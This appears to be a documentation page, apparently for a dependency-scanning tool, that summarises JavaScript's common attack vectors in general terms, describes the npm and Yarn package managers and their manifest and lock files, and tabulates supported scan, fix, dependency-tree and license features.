JavaScript

Description

JavaScript is a programming language used for building web applications, which is also widely used for building server-side, desktop, and mobile applications. Its popularity also make it a prime target for hackers, since JavaScript is used mostly in front-end development and some of its vulnerabilities can be exploited in simple web browsing.
Most common JavaScript attack vectors include:

  • Executing malicious script
  • Stealing a user’s established session data or data from the browser’s localStorage
  • Tricking users into performing unintended actions, exploiting vulnerabilities in the source code of web applications

Package Managers

NPM

NPM is the default package manager for Node.js with a CLI tool that helps install, manage, and remove Node.js packages. It also enables users to share open-source Node.js packages. NPM offers more than a million packages in its registry. While the sheer variety offered is an advantage, this also means there are potentially a huge number of hidden vulnerabilities in these packages installed in web application projects.

Files:
package.json
package-lock.json

Yarn

Yarn is a package manager that can also be used as a project manager. Yarn was developed by Facrebook in 2016 as a replacement for NPM. It was designed to offer more advanced features that NPM lacked at the time (such as version locking) and create a more secure, stable, efficient product. However, since Yarn was released, NPM has added several crucial features. In its current state, Yarn is now more of an alternative to NPM rather than a replacement.

Files:
package.json
yarn.lock

Package managerScanFixDependency treeLicense
npm✔️✔️✔️✔️
Yarn✔️✔️✔️✔️